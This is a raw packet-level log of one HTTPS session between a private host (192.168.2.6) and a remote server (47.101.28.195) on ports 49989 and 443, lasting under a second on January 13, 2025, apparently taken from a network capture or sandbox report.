Jan 13, 2025 02:06:41.294465065 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.294502974 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.294529915 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.294553995 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.294580936 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.294599056 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.294836044 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.294888973 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.294909954 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.295650959 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.295701981 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.295754910 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.295799971 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.296201944 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.296248913 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.296469927 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.296514034 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.297079086 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.297126055 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.297135115 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.297152996 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.297178030 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.297199965 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.301069021 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.301131964 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.301181078 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.301233053 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.301369905 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.301417112 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.302108049 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.302162886 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.302350044 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.302400112 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.342000961 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.342047930 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.381210089 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.381264925 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.381311893 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.381320953 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.381339073 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.381356955 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.381360054 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.381370068 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.381397009 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.381644964 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.381683111 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.381751060 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.381784916 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.382479906 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.382518053 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.382657051 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.382692099 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.382925987 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.382965088 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.383187056 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.383223057 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.383264065 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.383297920 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.383413076 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.383450031 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.383873940 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.383908987 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.383949041 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.383982897 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.384115934 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.384145975 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.384150982 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.384155989 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.384176970 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.384193897 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.384884119 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.384921074 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.387953997 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.388016939 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.388130903 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.388166904 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.388212919 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.388247967 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.388560057 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.388597012 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.388634920 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.388672113 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.388781071 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.388818026 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.389348984 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.389377117 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.389388084 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.389394999 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.389409065 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.389429092 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.389528990 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.389559031 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.389566898 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.389569998 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.389592886 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.389610052 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.428669930 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.428756952 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.428782940 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.428792953 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.428837061 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.467921972 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.467956066 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.467989922 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.468035936 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.468049049 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.468070984 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.468086004 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.468220949 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.468259096 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.468314886 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.468353987 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.468386889 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.468422890 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.468561888 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.468592882 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.468607903 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.468611956 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.468624115 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.468650103 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.468703032 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.468744993 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.469163895 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.469202042 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.469245911 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.469280958 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.469338894 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.469372034 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.469420910 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.469458103 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.472980976 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.473032951 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.473051071 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.473099947 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.473102093 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.473112106 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.473141909 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.473151922 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.473155022 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.473165989 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.473189116 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.473208904 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.473218918 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.473225117 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.473242044 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.473272085 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.473274946 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.473283052 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.473313093 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.473336935 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.473429918 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.473484039 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.473505020 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.473548889 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.474668026 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.474716902 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.474757910 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.474802971 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.538008928 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.538113117 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.539757013 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.539827108 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.541516066 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.541580915 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.544996977 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.545064926 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.546724081 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.546780109 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.550065994 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.550116062 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.551850080 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.551904917 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.554600954 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.554653883 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.557054996 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.557106972 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.558820963 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.558873892 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.562222004 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.562273979 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.563951969 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.564002037 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.565613031 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.565661907 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.569015980 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.569083929 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.570807934 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.570868015 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.580816031 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.580849886 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.580877066 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.580910921 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.580945015 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.580965996 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.581011057 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.581064939 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.581244946 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.581294060 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.582485914 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.582530022 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.585793018 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.585861921 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.587424994 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.587620974 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.590677023 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.590743065 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.592432976 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.592494965 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.595556974 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.595643044 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.599416971 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.599493980 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.601931095 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.601994038 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.608926058 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.609000921 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.611748934 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.611825943 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.614840984 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.614922047 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.618491888 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.618588924 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.619657993 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.619735003 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.634839058 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.634916067 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.634937048 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.634989023 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.635725021 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.635776997 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.635808945 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.635862112 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.637418032 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.637465000 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.637476921 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.637505054 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.637535095 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.637556076 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.639101028 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.639163971 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.639167070 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.639182091 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.639206886 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.639233112 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.642641068 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.642699957 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.642703056 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.642720938 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.642749071 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.642771006 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.647727013 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.647782087 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.647802114 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.647850037 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.650775909 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.650824070 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.650832891 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.650882959 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.655942917 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.655992985 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.656007051 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.656013966 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.656028032 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.656049013 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.661037922 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.661092997 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.661123037 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.661185026 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.666007996 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.666059971 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.671051025 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.671116114 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.671153069 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.671210051 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.675268888 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.675334930 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.675338030 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.675359011 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.675412893 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.675412893 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.679564953 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.679617882 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.679630041 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.679651022 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.679676056 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.679699898 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.686089993 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.686145067 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.686152935 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.686172009 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.686197042 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.686218023 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.695806026 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.695856094 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.695864916 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.695879936 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.695900917 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.695929050 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.703483105 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.703535080 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.703551054 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.703593969 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.793889046 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.794013023 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.794085979 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.794126034 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.794157982 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.795162916 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.795996904 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.796072006 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.798412085 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.798480988 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.798522949 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.798590899 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.801610947 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.801668882 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.803345919 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.803409100 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.804284096 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.804332018 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.804341078 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.804351091 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.804378986 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.804395914 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.804598093 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.804649115 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.805408955 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.805461884 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.806129932 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.806175947 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.806214094 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.806221008 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.806230068 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.806269884 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.806464911 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.806518078 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.806519985 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.806533098 CET	443	49989	47.101.28.195	192.168.2.6
Jan 13, 2025 02:06:41.806561947 CET	49989	443	192.168.2.6	47.101.28.195
Jan 13, 2025 02:06:41.806576967 CET	49989	443	192.168.2.6	47.101.28.195
